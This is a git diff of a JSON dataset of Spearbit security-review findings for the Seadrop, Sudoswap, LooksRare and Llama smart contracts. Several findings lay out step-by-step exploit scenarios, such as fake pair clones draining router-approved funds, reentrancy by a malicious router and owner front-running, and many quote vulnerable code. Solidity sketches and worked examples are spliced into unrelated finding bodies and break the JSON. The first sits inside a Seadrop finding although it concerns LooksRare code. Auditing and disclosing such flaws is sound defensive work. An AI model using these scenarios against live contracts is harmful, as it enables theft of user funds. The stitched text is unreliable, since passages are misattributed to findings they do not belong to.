TokenGatedDrop in ERC721SeaDrop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "restrictFeeRecipients is always true for either PublicDrops or TokenGatedDrops. 
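A minimal sketch of the suggested guard (hypothetical wrapper name; the real _transferFungibleTokens signature may differ), which also covers the zero-amount case discussed in a later finding:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

abstract contract FungibleTransferSketch {
    function _transferFungibleTokens(address currency, address sender, address recipient, uint256 amount) internal virtual;

    // Skip transfers that would be no-ops: zero amounts and self-transfers.
    function _transferFungibleTokensIfNeeded(address currency, address sender, address recipient, uint256 amount) internal {
        if (amount == 0 || sender == recipient) return;
        _transferFungibleTokens(currency, sender, recipient, amount);
    }
}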
When either one of these drops gets created/updated by calling one of the four functions below on an ERC721SeaDrop contract, its value is hardcoded as true: updatePublicDrop updatePublicDropFee updateTokenGatedDrop updateTokenGatedDropFee", + "title": "Keep the order of parameters consistent in updateStrategy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In updateStrategy, isActive is set first when updating storage, and it's the second parameter when supplied to the StrategyUpdated event. But it is the last parameter supplied to updateStrategy.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Reformat lines for better readability", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "These lines are too long to be readable. A mistake isn't easy to spot.", + "title": "_transferFungibleTokens does not check whether the amount is 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "_transferFungibleTokens does not check whether amount is 0 to skip transferring to recipient. For the ask recipient and creator amounts the check is performed just before calling this function. But the check is missing for the affiliate and protocol fees.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Comment is a copy-paste", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "This comment is exactly the same as this one. This is a copy-paste mistake.", + "title": "StrategyItemIdsRange.executeStrategyWithTakerAsk - Maker's bid amount might be entirely fulfilled by a single ERC1155 item", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyItemIdsRange allows a buyer to specify a range of potential item ids (both ERC721 and ERC1155) and a desired amount, then a seller can match the buyer's request by picking a subset of items from the provided range so that the desired amount of items are eventually fulfilled. A taker might pick a single ERC1155 item id from the range and fulfill the entire order with multiple instances of that same item.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Usage of floating pragma is not recommended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "^0.8.11 is declared in files. In foundry.toml: solc_version = '0.8.15' is used for the default build profile. In hardhat.config.ts and hardhat-coverage.config.ts: "0.8.14" is used. 
31", + "title": "Define named constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": " ExecutionManager.sol#L289 : 0x7476320f is cast sig \"OutsideOfTimeRange()\" TransferSelectorNFT.sol#L30 : 0xa7bc96d3 is cast sig \"transferItemsERC721(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC721.selector TransferSelectorNFT.sol#L31 : 0xa0a406c6 is cast sig \"transferItemsERC1155(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC1155.selector.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Clones with malicious extradata are also considered valid clones", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Spearbit discovered that the functions verifying if a contract is a pair do so by only checking the rst 54 bytes (i.e. the Proxy code). An attacker could deploy a contract that starts with the rst 54 bytes of proxy code but have a malicious payload, and these functions will still verify it as a legitimate clone. We have found this to be a critical issue based on the feasibility of a potential exploit. Consider the following scenario: 1. An attacker creates a malicious pair by making a copy of the source of cloneETHPair() supplying malicious values for factory, bondingCurve, nft and poolType using a valid template for the connected contract. 2. The attacker has a contract with valid proxy code, connected to a valid template, but the rest of the parameters are invalid. 3. The Pair is initialized via a copy of initialize() of LSSVMPair, which calls __Ownable_init() to set a malicious owner. 4 4. The malicious owner calls call(), with target equal to the router contract and the calldata for the function pairTransferERC20From(): // Owner is set by pair creator function call(address payable target, bytes calldata data) external onlyOwner { // Factory is malicious LSSVMPairFactoryLike _factory = factory(); // `callAllowed()` is malicious and returns true require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result, ) = target.call{value: 0}(data); require(result, \"Call failed\"); ,! } 5. The check for onlyOwner and require pass, therefore pairTransferERC20From() is called with the malicious Pair as msg.sender. 6. The router checks if it is called from a valid pair via isPair(): function pairTransferERC20From(...) external { // Verify caller is a trusted pair contract // The malicious pair passed this test require(factory.isPair(msg.sender, variant), \"Not pair\"); ... token.safeTransferFrom(from, to, amount); } 7. Because the function isPair() only checks the rst 54 bytes (the runtime code including the implementation address), isPair() does not check for extra parameters factory, bondingCurve, nft or poolType: 5 function isPair(address potentialPair, PairVariant variant) ... { ... } else if (variant == PairVariant.ENUMERABLE_ETH) { return ,! LSSVMPairCloner.isETHPairClone(address(enumerableETHTemplate),potentialPair); } ... } function isETHPairClone(address implementation, address query) ... { ... // Compare expected bytecode with that of the queried contract let other := add(ptr, 0x40) extcodecopy(query, other, 0, 0x36) result := and( eq(mload(ptr), mload(other)), // Checks 32 + 22 = 54 bytes eq(mload(add(ptr, 0x16)), mload(add(other, 0x16))) ) } 8. 
Now the malicious pair is considered valid, the require statement in pairTransferERC20From() has passed and tokens can be transferred to the attacker from anyone who has set an allowance for the router.", + "title": "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the above context, a maker is bidding a maximum price pmax and a taker is asking a minimum price pmin; the strategy should calculate a price p in the range [pmin, pmax] and so we would need to have pmin <= pmax. The above strategies pick the execution price to be pmax (the maximum price bid by the maker), and since the taker is the caller to the protocol we would only need to require pmin <= pmax. But the current requirement is pmin = pmax. if ( ... || makerBid.maxPrice != takerAsk.minPrice) { revert OrderInvalid(); }", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Critical Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Factory Owner can steal user funds approved to the Router", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "A pair owner can make arbitrary calls to any contract that has been approved by the factory owner. The code in the factory intends to prevent router contracts from being approved for calls because router contracts can have access to user funds. An example includes the pairTransferERC20From() function, that can be used to steal funds from any account which has given it approval. The router contracts can nevertheless be whitelisted by first being removed as a router and then being whitelisted. This way anyone can deploy a pair and use the call function to steal user funds.", + "title": "Change occurrences of whitelist to allowlist and blacklist to blocklist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the codebase, whitelist (blacklist) is used to represent entities or objects that are allowed (denied) to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: High Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Missing check in the number of Received Tokens when tokens are transferred directly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Within the function _validateTokenInput() of LSSVMPairERC20, two methods exist to transfer tokens. In the first method via router.pairTransferERC20From() a check is performed on the number of received tokens. In the second method no checks are done. Recent hacks (e.g. Qubit Finance) have successfully exploited safeTransferFrom() functions which did not revert nor transfer tokens. Additionally, with malicious or re-balancing tokens the number of transferred tokens might be different from the amount requested to be transferred. function _validateTokenInput(...) ... { ... if (isRouter) { ... // Call router to transfer tokens from user uint256 beforeBalance = _token.balanceOf(_assetRecipient); router.pairTransferERC20From(...) // Verify token transfer (protect pair against malicious router) require( _token.balanceOf(_assetRecipient) - beforeBalance == 
inputAmount, \"ERC20 not transferred in\"); } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } }", + "title": "Add more documentation on expected priceFeed decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The Chainlink strategies are making the following assumptions 1. All priceFeeds in StrategyFloorFromChainlink have a decimals value of 18. 2. The priceFeed in StrategyUSDDynamicAsk has a decimals value of 8. Any priceFeed that is added that does not match these assumptions would lead to incorrect calculations.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Malicious assetRecipient could get an unfair amount of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The function _swapNFTsForToken() of LSSVMRouter calls safe- TransferFrom(), which then calls ERC721Received of assetRecipient. A ma- licious assetRecipient could manipulate its NFT balance by buying additional NFTs via the Pair and sending or selling them back to the Pair, enabling the malicious actor to obtain an unfair amount of tokens via routerSwapNFTsForTo- ken(). 8 function _swapNFTsForToken(...) ... { ... swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // call to onERC721Received of assetRecipient } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); // checks the token balance of assetRecipient } ,! ,! }", + "title": "Code duplicates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "* In some places, Chainlink staleness is checked using block.timestamp - updatedAt > maxLa- tency, and in other places it is checked using block.timestamp > maxLatency + updatedAt. Consider refactor- ing this code into a helper function. Otherwise, it would be better to use only one version of the two code snippets across the protocol. The validation check to match assetType with the actual amount of items being transferred is duplicated among the different strategies instead of being implemented at a higher level once, such as in a common function or class that can be reused among the different strategies. _executeStrategyForTakerAsk and _executeStrategyForTakerBid almost share the same code. TakerBid, TakerAsk can be merged into a single struct. MakerBid, MakerAsk can be merged into a single struct.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Malicious Router can exploit cacheAssetRecipientNFTBalance to drain pair funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "A malicious router could be whitelisted by an inattentive or a ma- licious factory owner and drain pair funds in the following exploit scenario: 1. Call the cache function. Suppose that the current balance is 10, so it gets cached. 2. Sell 5 NFTs to the pair and get paid using swapNFTsForToken. Total bal- ance is now 15 but the cached balance is still 10. 3. Call routerSwapNFTsForToken. 
This function will compute total_balance - cached_balance, assume 5 NFTs have been sent to it and pay the user. However, no new NFTs have been sent and it already paid for them in Step 2.", + "title": "Low level calls are not recommended as they lack type safety and won't revert for calls to EOAs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Low-level calls are not recommended for interaction between different smart contracts in modern versions of the compiler, mainly because they lack type safety, return data size checks, and won't revert for calls to Externally Owned Accounts.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Malicious Router can steal NFTs via Re-Entrancy attack", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "If the factory owner approves a malicious _router, it is possible for the malicious router to call functions like swapTokenForAnyNFTs() and set isRouter to true. Once that function reaches router.pairTransferERC20From() in _validateTokenInput(), they can re-enter the pair from the router and call swapTokenForAnyNFTs() again. This second time the function reaches router.pairTransferERC20From(), allowing the malicious router to execute a token transfer so that the require of _validateTokenInput is satisfied when the context returns to the pair. When the context returns from the reentrant call back to the original call, the require of _validateTokenInput would still pass because the balance was cached before the reentrant call. Therefore, an attacker will receive 2 NFTs by sending tokens only once.", + "title": "Insufficient input validation of orders (especially on the Taker's side)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "There is a lack of consistency in the validation of parameters, as some fields of the taker's order are checked against the maker's order while others are not. It is worth noting that we have not identified any significant impact caused by this issue. Missing validation of strategyId Missing validation of collection Most strategies only validate length mismatches on one side of the order. Also, they don't usually validate that the lengths match between both sides. For example, in the DutchAuction strategy, if the makerAsk has itemIds and amounts arrays of length 2 and 2, then it would be perfectly valid for the takerBid to use itemIds and amounts arrays of length 5 and 7, as long as the first two elements of both arrays match what is expected. (FYI: I filed a related issue for the ItemIdsRange strategy, which I think is more severe of an issue because the mismatched lengths can actually be returned from the function).", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "getAllHeldIds() of LSSVMPairMissingEnumerable is vulnerable to a denial of service attack", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPairMissingEnumerable tries to compensate for NFT contracts that do not have ERC721Enumerable implemented. However, this cannot be done for everything as it is possible to use transferFrom() to send an NFT from the same collection to the Pair. 
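This works because only safeTransferFrom invokes the receiver hook; a small illustration (assumes OpenZeppelin's IERC721 interface):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol";

contract HookBypassDemo {
    // Plain transferFrom performs no onERC721Received callback on the pair,
    // so hook-based bookkeeping (such as the pair's idSet) is never updated,
    // while nft.balanceOf(pair) still increases.
    function pushWithoutHook(IERC721 nft, address pair, uint256 id) external {
        nft.transferFrom(msg.sender, pair, id); // caller must own/approve id
    }
}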
In that case the callback onERC721Received() will not be triggered and the idSet administration of LSSVMPairMissingEnumerable will not be updated. This means that nft().balanceOf(address(this)); can be different from the elements in idSet. Assuming an actor accidentally, or on purpose, uses transferFrom() to send additional NFTs to the Pair, getAllHeldIds() will fail as idSet.at(i) for unregistered NFTs will fail. This can be used in a griefing attack. getAllHeldIds() in LSSVMPairMissingEnumerable: function getAllHeldIds() external view override returns (uint256[] memory) { uint256 numNFTs = nft().balanceOf(address(this)); // returns the registered + unregistered NFTs uint256[] memory ids = new uint256[](numNFTs); for (uint256 i; i < numNFTs; i++) { ids[i] = idSet.at(i); // will fail at the unregistered NFTs } return ids; } The following checks performed with _nft.balanceOf() might not be accurate in combination with LSSVMPairMissingEnumerable. Risk is low because, with any additional NFTs, later calls to _sendAnyNFTsToRecipient() and _sendSpecificNFTsToRecipient() will fail. However, this might make it more difficult to troubleshoot issues. function swapTokenForAnyNFTs(...) ... { ... require((numNFTs > 0) && (numNFTs <= _nft.balanceOf(address(this))),"Ask for > 0 and <= balanceOf NFTs"); ... _sendAnyNFTsToRecipient(_nft, nftRecipient, numNFTs); // could fail ... } function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),"Must ask for > 0 and < balanceOf NFTs"); // '<' should be '<=' ... _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); // could fail ... } Note: The error string < balanceOf NFTs is not accurate.", + "title": "LooksRareProtocol's owner can take maker's tokens for signed orders with unimplemented strategyIds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "If a maker signs an order that uses a strategyId that hasn't been added to the protocol yet, the protocol owner can add a malicious strategy afterward such that a taker would be able to provide no fulfillment but take all the offers.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "With NFT pools the protocol fees end up in assetRecipient instead of _factory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Assume a scenario where an NFT pool with assetRecipient set has the received funds sent directly to the assetRecipient. Now, suppose a user executes the swapTokenForSpecificNFTs(). The function _validateTokenInput() sends the required input funds, including fees, to the assetRecipient. The function _payProtocolFee() tries to send the fees to the _factory. However, this function attempts to do so from the pair contract. The pair contract does not have any funds because they have been sent directly to the assetRecipient. So following this action the payProtocolFee() lowers the fees to 0 and sends this number to the _factory, while the fees end up at the assetRecipient instead of at the _factory. Note: The same issue occurs in swapTokenForAnyNFTs(). This issue occurs with both ETH and ERC20 NFT Pools, although their logic is slightly different. 
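One conceivable direction for a fix, sketched with hypothetical names (the report does not prescribe an implementation): carve the protocol fee out of the incoming funds before they reach the assetRecipient, so the fee never depends on the pair's own balance.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

abstract contract PairFeeSketch {
    function _sendToken(address to, uint256 amount) internal virtual;

    // The fee is taken from the incoming amount first; only the remainder is
    // forwarded to the assetRecipient, making the pair's balance irrelevant.
    function _takeInputWithFee(address factory, address assetRecipient, uint256 inputAmount, uint256 protocolFee) internal {
        _sendToken(factory, protocolFee);
        _sendToken(assetRecipient, inputAmount - protocolFee);
    }
}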
This issue occurs both when swapTokenForSpecificNFTs() is called directly as well as indirectly via the LSSVMRouter. Although the pool fees are 0 with NFT pools, the factory fee is still present. Luckily, TRADE pools cannot have an assetRecipient as this would also create issues. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); // sends inputAmount to assetRecipient _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); _refundTokenToSender(inputAmount); _payProtocolFee(_factory, protocolFee); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { ... function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ... uint256 pairTokenBalance = _token.balanceOf(address(this)); if (protocolFee > pairTokenBalance) { protocolFee = pairTokenBalance; } _token.safeTransfer(address(_factory), protocolFee); // tries to send from the Pair contract } } abstract contract LSSVMPairETH is LSSVMPair { function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ... uint256 pairETHBalance = address(this).balance; if (protocolFee > pairETHBalance) { protocolFee = pairETHBalance; } payable(address(_factory)).safeTransferETH(protocolFee); // tries to send from the Pair contract } }", + "title": "Strategies with faulty price feeds can have unwanted consequences", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the LooksRare protocol, once a strategy has been added its implementation and selector cannot be updated. This is good since users who sign their MakerBid or MakerAsk can trustlessly examine the strategy implementation before including them into their orders. Some strategies might depend on other actors such as price feeds. This is the case for StrategyUSDDynamicAsk and StrategyFloorFromChainlink. If for some reason these price feeds do not return the correct prices, these strategies can have a slight deviation from their original intent. Case StrategyUSDDynamicAsk If the price feed returns a lower price, a taker can bid on an order with that lower price. This scenario is guarded by MakerAsk's minimum price. But the maker would not receive the expected amount if the correct price was reported and was greater than the maker's minimum ask. Case StrategyFloorFromChainlink For executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk, if the price feed reports a floor price higher than the maker's maximum bid price, the taker can match with the maximum bid. Thus the maker ends up paying more than the actual floor adjusted by the discount formula. 
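As a hypothetical worked example of the fixed-discount case (all numbers invented):
// Feed reports floor = 10 ETH while the real floor is 8 ETH; fixed discount = 1 ETH.
uint256 desiredPrice = floorPrice - discountAmount; // 10 - 1 = 9 ETH
// A maker maximum bid of 9.5 ETH >= 9 ETH, so the taker matches at 9 ETH,
// 2 ETH above the correctly discounted price of 8 - 1 = 7 ETH.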
For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid, if the price feed reports a floor price lower than the maker's minimum ask price, the taker can match with the minimum ask price and pay less than the actual floor price (adjusted by the premium).", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Error codes of Quote functions are unchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The error return values from functions getBuyNFTQuote() and getSellNFTQuote() are not checked in contract LSSVMRouter.sol, whereas other functions in contract LSSVMPair.sol do check for error == CurveErrorCodes.Error.OK. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function getBuyNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } function swapTokenForAnyNFTs(...) external payable virtual returns (uint256 inputAmount) { ... (error, ...) = _bondingCurve.getBuyInfo(...); require(error == CurveErrorCodes.Error.OK, \"Bonding curve error\"); ... } } LSSVMRouter.sol#L526 (, , pairOutput, ) = swapList[i].pair.getSellNFTQuote(...); The following contract lines contain the same code snippet below: LSSVMRouter.sol#L360, LSSVMRouter.sol#L407, LSSVMRouter.sol#L450, LSSVMRouter.sol#L493, LSSVMRouter.sol#L627, LSSVMRouter.sol#L664 (, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...); Note: The current Curve contracts, which implement the getBuyNFTQuote() and getSellNFTQuote() functions, have a limited number of potential errors. However, future Curve contracts might add additional error codes.", + "title": "The provided price to IERC2981.royaltyInfo does not match the specifications", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In CreatorFeeManagerWithRoyalties and CreatorFeeManagerWithRebates, if royaltyFeeRegistry.royaltyInfo does not return a non-zero creator address, we check whether the collection supports IERC2981 and if it does, we loop over each itemId and call the collection's royaltyInfo endpoint. But the input price parameter provided to this endpoint does not match the specification of EIP-2981: /// @param _salePrice - the sale price of the NFT asset specified by _tokenId The price provided in the viewCreatorFeeInfo functions is the price for the whole batch of itemIds and not the individual tokens itemIds[i] provided to the royaltyInfo endpoint. Even if the return values (newCreator, newCreatorFee) would all match, it would not mean that newCreatorFee should be used as the royalty for the whole batch. An example is a royalty that is not percentage-based but a fixed price.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Swaps can be front run by Pair Owner to extract any profit from slippage allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "If the user adds a nonzero slippage allowance, the pair owner can front run the swap to increase the fee/spot price and steal all of the slippage allowance. 
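A minimal sketch of the front-run (the owner-only setter and the victim's parameters are illustrative assumptions):
// Owner transaction, mined just before the victim's swap:
pair.changeSpotPrice(higherSpotPrice); // owner-only price bump
// The victim's swapTokenForAnyNFTs(..., maxExpectedTokenInput, ...) still
// succeeds, but now consumes the entire padded slippage allowance.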
This basically makes sandwich attacks much easier and cheaper to execute for the pair owner.", + "title": "Replace the abi.encodeWithSelector with abi.encodeCall to ensure type and typo safety", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the context above, abi.encodeWithSelector is used to create the call data for a call to an external contract. This function does not guard against mismatched types being used for the input parameters.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Add check for numItems == 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions getBuyInfo() and getSellInfo() in LinearCurve.sol check that numItems != 0. However, the same getBuyInfo() and getSellInfo() functions in ExponentialCurve.sol do not perform this check. contract LinearCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // We only calculate changes for buying 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } function getSellInfo(...) ... { // We only calculate changes for selling 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } } contract ExponentialCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // No check on `numItems` uint256 deltaPowN = delta.fpow(numItems, FixedPointMathLib.WAD); ... } function getSellInfo(...) ... { // No check on `numItems` uint256 invDelta = FixedPointMathLib.WAD.fdiv(delta, FixedPointMathLib.WAD); ... } } If the code remains unchanged, an erroneous situation may not be caught and funds might be sent when selling 0 NFTs. Luckily, when numItems == 0 the resulting outputValue of the functions in ExponentialCurve is still 0, so there is no real issue. However, it is still important to fix this because a derived version of these functions might be used by future developers.", + "title": "Use the inline keccak256 with the formatting suggested when defining a named constant for an EIP-712 type hash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Hardcoded bytes32 EIP-712 type hashes are defined in the OrderStructs library.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Disallow arbitrary function calls to LSSVMPairETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPairETH contains an open fallback() function. The fallback() is most likely necessary because the proxy appends extra calldata, so plain ETH transfers do not reach the receive() function. However, without additional checks any function call to an ETH Pair will succeed. This could result in unforeseen scenarios which hackers could potentially exploit. fallback() external payable { emit TokenDeposited(msg.value); }", + "title": "The castApprovalBySig and castDisapprovalBySig functions can revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The castApprovalBySig and castDisapprovalBySig functions are used to cast an approve or disapprove via an off-chain signature. 
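For context, a rough sketch of the relayer flow (argument order illustrative): anyone may submit the policyholder's signature, so inside the call msg.sender is the relayer rather than the signer:
// Hypothetical relayer submitting a signed approval on behalf of a policyholder:
llamaCore.castApprovalBySig(policyholder, role, actionInfo, reason, v, r, s);
// Here msg.sender is the relayer, while the strategy is queried with msg.sender.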
Within the _preCastAssertions a check is performed against the strategy using msg.sender instead of policyholder; the strategy (e.g. AbsoluteStrategy) uses that argument to check if the cast sender is a policyholder. isApproval ? actionInfo.strategy.isApprovalEnabled(actionInfo, msg.sender) : actionInfo.strategy.isDisapprovalEnabled(actionInfo, msg.sender); While this works for a normal cast, the signature-based variants will fail, as the sender can be anyone who calls the method with the signature signed off-chain.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Critical Risk" ] }, { - "title": "Only transfer relevant funds for PoolType", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The functions _initializePairETH() and _initializePairERC20() allow for the transfer of ETH/ERC20 and NFTs even when this is not relevant for the PoolType. Although funds can be rescued from the Pair, it is perhaps better to prevent these types of mistakes. function _initializePairETH(...) ... { ... // Transfer initial `ETH` to `pair` // Only relevant for `PoolType.TOKEN` or `PoolType.TRADE` payable(address(_pair)).safeTransferETH(msg.value); ... // Transfer initial `NFT`s from `sender` to `pair` for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } } function _initializePairERC20(...) ... { ... // Transfer initial tokens to pair // Only relevant for PoolType.TOKEN or PoolType.TRADE _token.safeTransferFrom(msg.sender,address(_pair),_initialTokenBalance); ... // Transfer initial NFTs from sender to pair for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } }", + "title": "The castApproval/castDisapproval doesn't check if role parameter is the approvalRole", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "A policyholder should be able to cast their approval for an action if they have the approvalRole defined in the strategy. It should not be possible for other roles to cast an action. The _castApproval method verifies that the policyholder has the role passed as an argument but doesn't check that it is actually the approvalRole, which is the role eligible to cast an approval. This means any role in the llama contract can participate in the approval with completely different quantities (weights). The same problem occurs for the castDisapproval function as well.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Critical Risk" ] }, { - "title": "Check for 0 parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions setCallAllowed() and setBondingCurveAllowed() do not check that target != 0 while the comparable function setRouterAllowed() does check for _router != 0. function setCallAllowed(address payable target, bool isAllowed) external onlyOwner { ... // No check on target callAllowed[target] = isAllowed; } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { ... 
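// Hypothetical guard (not in the original code), mirroring the zero-address
// check in setRouterAllowed(): if (address(bondingCurve) == address(0)) revert();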
